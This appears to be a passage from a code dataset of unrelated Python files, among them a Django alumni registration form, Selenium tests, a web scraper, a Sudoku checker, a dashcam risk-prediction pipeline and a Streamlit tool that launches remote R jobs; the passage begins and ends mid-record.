200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu edad.'},\n        min_value=18,\n        max_value=105,\n    )\n\n    Mobile = forms.CharField(\n        label='Número de Teléfono', \n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '581234567890', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu número telefónico.'},\n        help_text=\"Ingresa tu número de teléfono sin guiones (-) ni el signo más (+)\",\n    )\n\n    Birthdate = forms.DateField(\n        label='Fecha de Nacimiento', \n        required=True,\n        widget=forms.DateInput(attrs={'class': \"form-control \",'type':'date', 'placeholder': '581234567890', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu fecha de nacimiento.'},\n        help_text=\"Utilice la ventana desplegable para seleccionar su fecha.\",\n    )\n\n    Mailing_city = forms.CharField(\n        label='Ciudad', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Ciudad', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu ciudad de envío de correo.'},\n    )\n\n    Mailing_state = forms.CharField(\n        label='Estado', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Estado', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu estado de envío de correo.'},\n    )\n\n    Mailing_country = forms.ChoiceField(\n        label='País', \n        required=True,\n        widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu país de envío de correo.'},\n        choices=COUNTRIES,\n    )\n\n    USB_alumn = forms.BooleanField(\n        label='Estudiante de la USB', \n        required=True,\n        error_messages={'required': 'Por favor ingresa si eres o no estudiante de la USB.'},\n    )\n\n    Cohorte = forms.IntegerField(\n        label='Cohorte', \n        required=True,\n        widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': '00', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu cohorte.'},\n        min_value=0,\n        max_value=99,\n        help_text=\"Por favor ingrese solamente el número de su cohorte (sin carnet).\",\n    )\n\n    Carnet = forms.IntegerField(\n        label='Carnet', \n        required=True,\n        widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': 
'10000', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu carnet.'},\n        min_value=10000,\n        max_value=15000,\n        help_text=\"Por favor ingrese solamente el número de su carnet (sin cohorte).\",\n    )\n\n    Undergrad_degree = forms.ChoiceField(\n        label='Pregrado', \n        required=True,\n        widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu título de pregrado.'},\n        choices=[(tag.name, tag.value) for tag in UndergraduateDegreeChoice],\n    )\n\n    USB_undergrad_campus = forms.ChoiceField(\n        label='Campus Pregrado USB', \n        required=True,\n        widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa el campus de la universidad de tu pregrado.'},\n        choices=[(tag.name, tag.value) for tag in CampusChoice],\n    )\n\n    Graduate_degree = forms.CharField(\n        label='Maestría', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Maestría', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa tu título de maestría, si no tienes puedes colocar \"None\".'},\n    )\n\n    Graduate_campus = forms.CharField(\n        label='Campus Maestría', \n        max_length=30,\n        required=True,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Campus Maestría', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n        error_messages={'required': 'Por favor ingresa el campus de la universidad de maestría, si no tienes puedes colocar \"None\".'},\n    )\n\n    Workplace = forms.CharField(\n        label='Lugar de Trabajo', \n        max_length=30,\n        required=False,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Boston', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n    )\n\n    Work_email = forms.CharField(\n        label=\"Correo electrónico de trabajo\",\n        max_length=60, \n        required=False, \n        widget=forms.EmailInput(attrs={'class': \"form-control\", 'placeholder': 'info@example.com', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n    )\n\n    Donor = forms.BooleanField(\n        label='Donante recurrente', \n        required=True,\n        error_messages={'required': 'Por favor ingresa si eres o no donante recurrente en AlumnUSB.'},\n    )\n\n    Social_networks = forms.CharField(\n        label='Redes sociales', \n        max_length=60,\n        required=False,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n    )\n\n    Twitter_account = forms.CharField(\n        label='Twitter', \n        max_length=60,\n        required=False,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n    )\n\n    Instagram_account = forms.CharField(\n        label='Instagram', \n        max_length=60,\n        required=False,\n        widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n    )\n\n    class Meta:\n        model = User_information\n        fields = (\n            'First_name',\n            'Middle_name',\n            'Last_name',\n            'Age',\n            'Mobile',\n            'Birthdate',\n            'Mailing_city',\n            'Mailing_state',\n            'Mailing_country',\n            'USB_alumn',\n            'Cohorte',\n            'Carnet',\n            'Undergrad_degree',\n            'USB_undergrad_campus',\n            'Graduate_degree',\n            'Graduate_campus',\n            'Workplace',\n            'Work_email',\n            'Donor',\n            'Social_networks',\n            
'Twitter_account',\n 'Instagram_account'\n )\n\n\nclass getUserDataForm(forms.ModelForm):#UserChangeForm):\n \"\"\"docstring for EditUserData\"\"\"\n #message = forms.CharField(widget=forms.Textarea(), max_length=4000)\n\n class Meta:\n model = User_information\n fields = (\n 'First_name',\n 'Middle_name',\n 'Last_name',\n 'Mailing_city',\n 'Mailing_state',\n 'USB_alumn',\n #'Codigo_Alumn_USB',\n 'Mailing_country',\n #'Email',\n 'Mobile',\n 'Cohorte',\n 'Birthdate',\n 'Age',\n 'Undergrad_degree',\n 'Graduate_degree',\n 'Carnet',\n 'USB_undergrad_campus',\n 'Graduate_campus',\n 'Work_email',\n 'Workplace',\n 'Donor',\n 'Social_networks',\n 'Twitter_account',\n 'Instagram_account'\n )\n\nclass pictureId(forms.Form):\n Pic_id = forms.IntegerField()","repo_name":"manuelguillegil/alumnusb-system","sub_path":"alumnusb_system/accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8767375283","text":"import requests\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python script.py <repository_name> <owner_name>\")\n sys.exit(1)\n\nrepository_name = sys.argv[1]\nowner_name = sys.argv[2]\n\nurl = f'https://api.github.com/repos/{owner_name}/{repository_name}/commits'\nparams = {'per_page': 10}\n\ntry:\n response = requests.get(url, params=params)\n response.raise_for_status() # Raise an HTTPError for bad responses (4xx and 5xx)\n\n commits = response.json()\n\n for commit in commits:\n sha = commit['sha']\n author_name = commit['commit']['author']['name']\n print(f\"{sha}: {author_name}\")\n\nexcept requests.exceptions.HTTPError as e:\n print(\"Error code:\", e.response.status_code)\nexcept requests.exceptions.RequestException as e:\n print(\"Error:\", e)\nexcept ValueError:\n print(\"Not a valid JSON\")\n","repo_name":"YASSINEBOUTAYEB1/alx-higher_level_programming","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9357305804","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nimport sys\n\nURL = \"https://www.campuscatalog.me/housing/\"\n\n\nclass Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n chrome_options = Options()\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--disable-extensions\")\n cls.driver = webdriver.Chrome(PATH, options=chrome_options)\n cls.driver.get(URL)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n def testSort(self):\n self.driver.get(URL)\n self.driver.implicitly_wait(10)\n self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/thead/tr/th[1]\"\n ).click()\n self.driver.implicitly_wait(10)\n housing = self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/tbody/tr[1]/td[1]/a\"\n )\n\n assert housing.text == \"05 Buckhead\"\n\n def testFilter(self):\n self.driver.get(URL)\n self.driver.implicitly_wait(10)\n self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/div[1]/div/div/button\"\n ).click()\n city_filter = self.driver.find_element(\n By.XPATH, \"/html/body/div[2]/div[3]/div[2]/form/div/div/input\"\n )\n 
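# type the chosen city into the filter input, then apply the filter below\n        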
city_filter.send_keys(\"Austin\")\n self.driver.find_element(\n By.XPATH, \"/html/body/div[2]/div[2]/div/button\"\n ).click()\n self.driver.implicitly_wait(10)\n\n housing = self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/tbody/tr[1]/td[1]/a\"\n )\n\n assert housing.text == \"Rhythm\"\n\n def testHousingInstance(self):\n self.driver.get(\"https://www.campuscatalog.me/housing/d2qz44k2/\")\n self.driver.implicitly_wait(20)\n name = self.driver.find_element(By.CLASS_NAME, \"Apartment_Name__Qv9vF\").text\n assert name == \"Gather Oxford\"\n address = self.driver.find_element(\n By.CLASS_NAME, \"Apartment_Location__1Vfrq\"\n ).text\n assert address == \"Oxford, 207 Hathorn Rd\"\n\n\nif __name__ == \"__main__\":\n PATH = sys.argv[1]\n unittest.main(argv=[\"first-arg-is-ignored\"])\n","repo_name":"ameer886/Campus-Catalog","sub_path":"front-end/src/gui_tests/housing_tests.py","file_name":"housing_tests.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5714583209","text":"import bs4\nfrom urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup \n\n# website url for scraping\nmy_url = 'https://www.stillwhite.com/backless-wedding-dresses?size=4&size=6&price=0-1500&back=1&page=1&listing=199026'\n\n# opening connection, grabbing the page\nuClient = uReq(my_url)\npage_html = uClient.read()\nuClient.close()\n\n# html parsing\npage_soup = soup(page_html, \"html.parser\")\n\n# grabs heach product\ncontainers = page_soup.findAll(\"li\", {\"data-page\":\"1\"})\n\n# initiate .csv file open and write\nfilename = \"products.csv\"\nf = open(filename, \"w\")\nheaders = \"brand, price, size, percent_savings, item_link\\n\"\nf.write(headers)\n \nfor container in containers:\n #\n title_container = container.findAll(\"div\",{\"class\":\"item-title-heading\"})\n brand_name = title_container[0].text\n #\n price_container = container.findAll(\"div\",{\"class\":\"item-title-price\"})\n item_price = price_container[0].text\n #\n size_container = container.findAll(\"small\",{\"class\":\"text-muted\"}) \n item_size = size_container[0].text.strip()\n for i in range(6):\n size_value = item_size[i]\n i += 1\n # \n percentage_savings = item_size[-3:]\n percent_comparison = \"%\"\n if percentage_savings[-1] != \"%\":\n percentage_savings = \"N/A\"\n #\n link_container = container.a.text\n link_container_test = container.a[\"href\"]\n #\n f.write(brand_name + \",\" + item_price.replace(\",\",\"'\") + \",\" + size_value + \",\" + percentage_savings + \",\" + \"https://www.stillwhite.com/\" + link_container_test + \"\\n\")\n \nf.close()\nprint(\"Check products.csv folder in direcotry for latest scrape!\")\n\n# pronto testing kit\n\"\"\"\nprint(\"brand: \" + brand_name)\nprint(\"price: \" +item_price)\nprint(\"size: \" + size_value)\nprint(\"percent. 
savings: \" + percentage_savings)\nprint(\"https://www.stillwhite.com/\" + link_container_test)\n\"\"\"\n","repo_name":"johnbeni93/web-scraper-app","sub_path":"my_first_webscrape.py","file_name":"my_first_webscrape.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9922221880","text":"'''program to check complete Sudoku grid\r\nnasreen hoosain\r\n11/05/14''' \r\n\r\n#function to check the grid \r\ndef check(grid):\r\n for l in grid:\r\n l.sort() #sort in numerical order\r\n if l[0] != '1': #if first number is not one\r\n return False\r\n elif l[8] != '9': #if first number is not 9\r\n return False\r\n else: # check if two same numbers next to each other\r\n for i in range(8):\r\n if l[i] == l[i+1]:\r\n return False\r\n else:\r\n return True\r\n \r\nif __name__ == '__main__':\r\n \r\n grid = []\r\n for row in range (9):\r\n x = input()\r\n grid.append(x) \r\n\r\n #get rows\r\n rows = []\r\n for j in range(9):\r\n row = []\r\n for i in range(9):\r\n row.append(grid[j][i])\r\n rows.append(row)\r\n \r\n #get columns\r\n cols = []\r\n for i in range(9):\r\n c = []\r\n for j in range(9):\r\n x = rows[j][i]\r\n c.append(x)\r\n cols.append(c) \r\n \r\n #get blocks\r\n blocks = []\r\n for i in range(9):\r\n b = []\r\n for j in range(9):\r\n x = rows[3*(i//3) + j//3][3*(i%3) + j%3] #put 3x3 blocks in row\r\n b.append(x)\r\n blocks.append(b) \r\n\r\n #check rows, columns and blocks\r\n if check(rows) == True and check(cols) == True and check(blocks) == True:\r\n print('Sudoku grid is valid')\r\n else:\r\n print('Sudoku grid is not valid')","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/hsnnas006/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7462757637","text":"# from setup import SettingEnvironment\n# SettingEnvironment()\nfrom pathlib import Path\nfrom Yolov7ObjectTracking.detect_and_track import *\nfrom SpeedETool import *\nfrom RVPextract import *\nimport json\nimport cv2\nimport time\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--folderpath', help='')\nparser.add_argument('--videopath', help='')\nparser.add_argument('--KML_file_path', help='')\nparser.add_argument('--vnp_det_option', type=int, default=0, help='0-Deephough, 1-RVNP')\n\nparser.add_argument('--FOV_horizontal', type=int, default=110, help='')\nparser.add_argument('--FOV_vertical', type=int, default=70, help='')\nparser.add_argument('--CameraHeight', type=float, default=2.0, help='')\n\nparser.add_argument('--ImageWidth', type=float, default=1280, help='')\nparser.add_argument('--ImageHeight', type=float, default=720, help='')\nargs = parser.parse_args()\n\ndef makeJson(frame_count, data, risk_json_path):\n datajson = {}\n f = open(data)\n data = json.load(f)\n\n for i in range(frame_count): \n frame_info = []\n risk1s, risk3s, risk10s = [], [], []\n\n risk_obj_1s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_1s']]\n for id in risk_obj_1s:\n for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n if (obj['id'] == id):\n risk1s.append({'id':id, 'object_location':obj['object_location']})\n \n risk_obj_3s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_3s']]\n for id in risk_obj_3s:\n for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n if 
(obj['id'] == id):\n                    risk3s.append({'id':id, 'object_location':obj['object_location']})\n        \n        risk_obj_10s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_10s']]\n        for id in risk_obj_10s:\n            for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n                if (obj['id'] == id):\n                    risk10s.append({'id':id, 'object_location':obj['object_location']})\n\n        frame_info.append({'risk1s':risk1s, 'risk3s':risk3s, 'risk10s':risk10s})\n        \n        datajson[f'frame{i}'] = frame_info\n\n    save_file = open(risk_json_path, \"w\") \n    json.dump(datajson, save_file) \n    \n    print('save file to risk.json')\n\nif __name__ == '__main__':\n    tstart = time.time()\n    # Input\n    folderpath = args.folderpath\n    videopath = args.videopath\n    KML_file_path = args.KML_file_path\n    FOV_hor, FOV_ver, CamHeight = args.FOV_horizontal, args.FOV_vertical, args.CameraHeight\n    ImageWidth = args.ImageWidth\n    ImageHeight = args.ImageHeight\n    vnp_det_option = args.vnp_det_option\n\n    folder_name = folderpath + '/FullFrame'\n    path = Path(folder_name)\n\n    if path.exists() and path.is_dir():\n        print(folder_name, 'already exists')\n    else:\n        path.mkdir()\n\n    print('Set up Finished')\n    \n    frame_interval = 3\n    # Result\n    vnp_output_path = folderpath + '/vnp.txt'\n    json_file_path = folderpath + '/output.json'\n    velocity_path = folderpath + '/velocity.txt'\n    risk_json_path = folderpath + '/risk.json'\n    video_path = folderpath + '/video.mp4'\n\n    print('\\nVIDEO PATH: ', videopath)\n    print('\\nSAVE RESULT TO FOLDER: ', folderpath)\n    print('\\n====================================================\\n')\n    print('Save VNP txt to : ', vnp_output_path)\n    \n    fps, frame_count = 14, 224\n    \n    t00 = time.time()\n    \n    if vnp_det_option == 0:\n        from vnp import MakeInput\n        fps, frame_count = MakeInput(folderpath, vnp_output_path, videopath, frame_interval, stage=2)\n    \n    elif vnp_det_option == 1:\n        scale = 0.65\n        extractor = MVextractor(videopath, frame_interval, scale)\n        extractor.R_VP_detection(vnp_output_path, 0)\n        \n        #fill non detected with nearest vnp\n        raw_data = read_data_from_file(vnp_output_path)\n        data = organize_data(raw_data, extractor.frame_count)\n        write_result_to_file(data, vnp_output_path)\n\n        fps, frame_count = extractor.fps, extractor.frame_count\n    \n    t01 = time.time()\n    print(fps, frame_count)\n\n    # print('\\n====================================================\\n')\n    # print('KML File process, save velocity to: ', velocity_path)\n    # VelocityExtract(velocity_path, KML_file_path, fps)\n    \n    print('\\n====================================================\\n')\n    print('Trajectory, save metadata to: ', json_file_path)\n    print('\\n====================================================\\n')\n    ins_matrix_info = [[FOV_hor, FOV_ver], CamHeight]\n    t10 = time.time()\n    TrajectoryAndMakingVideo(videopath, vnp_output_path, velocity_path, json_file_path, fps, (ImageHeight, ImageWidth), ins_matrix_info, frame_interval) \n    t11 = time.time()\n\n    t20 = time.time()\n    risk_json_file = makeJson(frame_count, json_file_path, risk_json_path)\n    t21 = time.time()\n    tend = time.time()\n    print('\\n----------------------------------------')\n    print('Frame skip: ', frame_interval)\n    print('----------------------------------------')\n    print('Total: ', tend - tstart)\n    print('Frame Extract + Deephough: \\t', t01 - t00)\n    print('Trajectory: \\t', t11 - t10)\n    print('Json generation: \\t', t21 - t20)\n    print('----------------------------------------')\n    print('FPS: ', round(frame_count/(tend - 
tstart),2))","repo_name":"keeganhuynh/Near-miss-accident-prediction-using-dashcam-videos","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6594923213","text":"import urllib.request\nimport json\nimport time\n\n# def fetch_record_info(record_url):\n# with urllib.request.urlopen(record_url) as result:\n#\n#\n# records_url = 'https://esgf-node.llnl.gov/esg-search/search/?experiment_id=ssp126&variable_id=siflswdtop&offset=0&limit=9999&type=Dataset&replica=false&latest=true&project=CMIP6&format=application%2Fsolr%2Bjson'\n#\n# with urllib.request.urlopen(records_url) as result_search:\n# data = json.loads(result_search.read().decode())\n# file_urls_to_download = data['response']['docs']\n#\n# for file_url_to_download in file_urls_to_download:\n# fetch_record_info(file_url_to_download)\n\ndef url_open_retry(url, retries = 0, retry_interval = 10):\n result = None\n for i in range(0, retries):\n try:\n result = urllib.request.urlopen(url)\n except:\n print('retrying')\n time.sleep(retry_interval)\n continue\n break\n return result\n\nurl = 'https://httpstat.us/500/cors'\n# url ='https://google.com'\nwith url_open_retry(url, retries= 3, retry_interval= 2) as result_search:\n print(result_search)\n\n# print(url_open_retry('https://httpstat.us/500/cors', retries= 3, retry_interval= 2))","repo_name":"tloureiro/cmip6_downloader","sub_path":"test/4_record_fetch_retry.py","file_name":"4_record_fetch_retry.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"21056193810","text":"__author__ = \"Alejandro Garau Madrigal\"\n\n\ndef caesar_cipher(input_text: str, offset: int = 3) -> str:\n \"\"\"\n The mighty function to cipher a text using caesar algorithm.\n :param input_text: text to cipher\n :param offset: value to shift. 
The default is 3\n    :return: ciphered text\n    \"\"\"\n    result = ''\n    for current_char in input_text:\n        ord_current = ord(current_char)\n        if 65 <= ord_current <= 90:\n            result += chr((((ord_current - 65) + offset) % 26) + 65)\n        elif 97 <= ord_current <= 122:\n            result += chr((((ord_current - 97) + offset) % 26) + 97)\n        else:\n            result += current_char\n    return result\n\n\ndef caesar_decipher2(input_text: str, offset: int = 3) -> str:\n    \"\"\"\n    The good, beefy version.\n    :param input_text: text to decipher\n    :param offset: the offset\n    :return: the deciphered text\n    \"\"\"\n    return caesar_cipher(input_text, (26 - offset))\n","repo_name":"Alkesst/PracticasSeguridad","sub_path":"practica1/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"13454390940","text":"# 3) Vous trouverez ci-dessous une liste contenant des détails sur plusieurs séries télévisées.\n\nseries = [\n    {\"title\": \"Breaking Bad\", \"seasons\": 5, \"initial_release\": 2008},\n    {\"title\": \"Fargo\", \"seasons\": 4, \"initial_release\": 2014},\n    {\"title\": \"Firefly\", \"seasons\": 1, \"initial_release\": 2002},\n    {\"title\": \"Rick and Morty\", \"seasons\": 4, \"initial_release\": 2013},\n    {\"title\": \"True Detective\", \"seasons\": 3, \"initial_release\": 2014},\n    {\"title\": \"Westworld\", \"seasons\": 3, \"initial_release\": 2016},\n    ]\n# Utilisez votre fonction, print_show_info, et une boucle for, pour itérer sur la liste series, et appelez votre fonction une fois pour chaque itération, en passant chaque dictionnaire. Vous devriez vous retrouver avec chaque série imprimée dans le format approprié.\n\ndef print_show_info(show):\n    print(f\"{show['title']} ({show['initial_release']}) - {show['seasons']} saison(s)\")\n\n\nfor show in series:\n    print_show_info(show)","repo_name":"MiKL5/Python","sub_path":"exercises/practice12/12.3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"15227953819","text":"\nimport streamlit as st\nimport datetime,os,time,psutil\nfrom streamlit import session_state\nimport json\nfrom app import app\nimport requests\n\n\nwith open('config.json', 'r') as f:\n    config = json.load(f)\n\n\nst.title( \"MIDistNet Remote Site Management Tools\")\n\nst.header('MIDistNet Remote Site Configuration Information')\n\nclient_name = st.text_input('Remote site name:', config['host_name'])\nserver_app_addr = st.text_input('Central Site API URL:', config['server_app'])\nif config['remote_public_ip'] == '127.0.0.1':\n    config['remote_public_ip'] = app.config['public_ip']\nremote_public_ip = st.text_input('Remote public IP address:', config['remote_public_ip'])\nsave_config_clicked = st.button('Save configuration')\n\nif save_config_clicked: \n    config['host_name'] = client_name.strip()\n    config['server_app'] = server_app_addr.strip()\n    config['remote_public_ip'] = remote_public_ip.strip()\n    with open('config.json', 'w') as f:\n        json.dump(config, f)\n\n\nst.header('MIDistNet Remote Site Job')\n\nif 'task_id' not in st.session_state:\n    st.session_state['task_id'] = ''\n\nif 'task_detail' not in st.session_state:\n    st.session_state['task_detail'] = {}\n\nif 'server_data' not in st.session_state:\n    st.session_state['server_data'] = {}\n\nst.caption(\"Remote Host container local IP: {}\".format(app.config['client_ip']))\n\ntask_id = st.text_input('Task 
id').strip()\nclient_ip = st.text_input('Remote Site Public IP:', remote_public_ip)\nclient_port = st.text_input('Remote Site Public Port:', app.config['client_port'])\n\nget_task_id_clicked = st.button('Get Task Detail')\nif get_task_id_clicked and len(task_id) > 10:\n    post_curl = '{}/read_task/{}'.format(server_app_addr,task_id)\n    r = requests.get(post_curl,verify=False)\n    r_json = json.loads(r.json()['data'])\n    if len(r_json) == 0 :\n        st.write(\"Task does not exist\")\n        st.session_state['task_id'] = ''\n    else:\n        task_detail = r_json['0']\n        st.session_state['task_id'] = task_detail['task_id']\n        st.session_state['task_detail'] = task_detail\n#        st.write (task_detail)\nif st.session_state['task_id'] != '':\n    task_detail = st.session_state['task_detail']\n    st.write(\"Task ID: \", task_detail['task_id'])\n    st.write(\"Total planned Remote Sites: \", str(task_detail[\"total_remote_sites\"]))\n    st.write(\"Acknowledged Remote Sites :\", str(task_detail[\"registered_remote_sites\"]))\n    st.write(\"Method: \", task_detail[\"method\"])\n    st.write(\"Missing variables in column: \" , task_detail[\"missing_variables\"])\n    st.write(\"Model: \", task_detail[\"model\"])\n#    st.write(\"Task Status: \", task_detail[\"status\"])\n    st.write(\"Central Site Public IP: \", task_detail[\"server_ip\"])\n#    st.write(\"Central Site Public Port: \", task_detail[\"server_port_from\"])\n\nregister_button = st.button('Acknowledge')\n\nif register_button : \n    if len(task_id) > 10 : \n        jsondata = {'task_id':task_id,\n                    'client_ip':client_ip,\n                    'client_port':client_port,\n                    'client_name':client_name \n                   }\n        r_reg = requests.post(server_app_addr+'/register', json=jsondata,verify=False)\n        st.session_state['server_data'] = r_reg.json() \n#        st.write(st.session_state['server_data'])\n        st.write(r_reg.json()['message'])\n\ndata_file = './data/dummy.txt'\nuploaded_file = st.file_uploader(\"Specify local file\")\n\n\nif uploaded_file is not None:\n    data_file = './data/' + client_ip + '_' + client_port + '_' + uploaded_file.name\n    with open(data_file,\"wb\") as f:\n        f.write(uploaded_file.getbuffer())\n\ncols_1 = st.columns(6)\n\nrun_button = cols_1[1].button('Run')\nrefresh_button = cols_1[2].button('Refresh')\nstop_button = cols_1[3].button('Stop')\nclear_all_R = cols_1[4].button('Kill All R processes')\ncols_1[0].write('Remote job:')\n\nstatus_placeholder = st.empty()\nstatus_text = status_placeholder.text_area('Running Status', value=f' ',key='Status', disabled = True )\n\n\nimport subprocess\n\nif 'pid' not in st.session_state:\n    st.session_state['pid'] = None\n\ndef run_command(args):\n\n    status_text = status_placeholder.text_area('Running Status', value=f\"Running '{' '.join(args)}'\",key='Status', disabled = True )\n\n    running_logs = open(st.session_state['log_file'], 'w')\n    st.session_state['log'] = running_logs\n\n    p = subprocess.Popen(args, cwd=\"./code/\",shell=False, stdout=running_logs,stderr=running_logs) # subprocess.PIPE\n\n    st.session_state['pid'] = p\n\n    stdout=None\n    stderr=None\n    time.sleep(2)\n\n    try:\n        stdout, stderr = p.communicate(timeout = 2)\n    except:\n        display_text = f\"Running '{' '.join(args)}' \\n\" \n        display_text += ' Job with PID {} is running in the background \\n'.format(p.pid)\n        if stdout :\n            display_text += stdout.decode('utf-8') + '\\n'\n        if stderr :\n            display_text += stderr.decode('utf-8') + '\\n'\n        status_text = status_placeholder.text_area('Running Status', value=display_text ,key='Status', disabled = True )\n    else:\n        display_text = 'Job Finished \\n'\n        if stdout :\n            display_text += stdout.decode('utf-8') 
+ '\\n'\n        if stderr :\n            display_text += stderr.decode('utf-8') + '\\n'\n        log_text=''\n        if st.session_state['log']:\n            st.session_state['log'].flush()\n        with open(st.session_state['log_file'], 'r') as f:\n            log_text = f.read()\n        display_text = ' Job with PID {} was aborted unexpectedly \\n Click stop to clear it. \\n {} '.format(st.session_state['pid'].pid,log_text)\n        status_text = status_placeholder.text_area('Running Status', value=display_text ,key='Status', disabled = True )\n\n\n#    try:\n#        result.check_returncode()\n#        status_text = status_placeholder.text_area('Running Status', value= result.stdout ,key='Status', disabled = True )\n#    except subprocess.CalledProcessError as e:\n#        status_text = status_placeholder.text_area('Running Status', value= result.stderr ,key='Status', disabled = True )\n#        raise e\n\ndef run_command_debug(args):\n    status_placeholder = st.empty()\n    status_text = status_placeholder.text_area('Running Status', value=f\"Running '{' '.join(args)}'\",key='Status', disabled = True )\n\n    result = subprocess.run(args, cwd=\"./code/\", capture_output=True, text=True)\n    st.session_state['pid'] = result\n\n    try:\n        result.check_returncode()\n        status_text = status_placeholder.text_area('Running Status', value= result.stdout ,key='Status', disabled = True )\n    except subprocess.CalledProcessError as e:\n        status_text = status_placeholder.text_area('Running Status', value= result.stderr ,key='Status', disabled = True )\n#        raise e\n\n    \nif run_button :\n\n#    this is not working\n#    if debug_option:\n#        refresh_button.enabled = False\n#        stop_button.enabled = False\n    \n\n    R_runtime_file = client_ip + '_' + client_port + '_r_runtime.R' \n\n    if 'ICE' in st.session_state['server_data']['core_function'] :\n        R_func_str = \"\"\"\n\nsource(\"{method}/{method}Remote.R\")\nargs = commandArgs(trailingOnly=TRUE)\nX=as.matrix(read.table(file=args[1]))\ncolnames(X) <- NULL\n\n{method}Remote(X,\"{client_port}\",\"{server_ip}\",\"{server_port}\")\n\n    \"\"\".format(method = st.session_state['server_data']['core_function'],\n               client_port = st.session_state['server_data']['client_port'],\n               server_ip = st.session_state['server_data']['server_ip'],\n               server_port = st.session_state['server_data']['server_port']\n               )\n\n    else:\n        R_func_str = \"\"\"\n\nsource(\"{method}/{method}Remote.R\")\nargs = commandArgs(trailingOnly=TRUE)\n\nX=as.matrix(read.table(file=args[1]))\ncolnames(X) <- 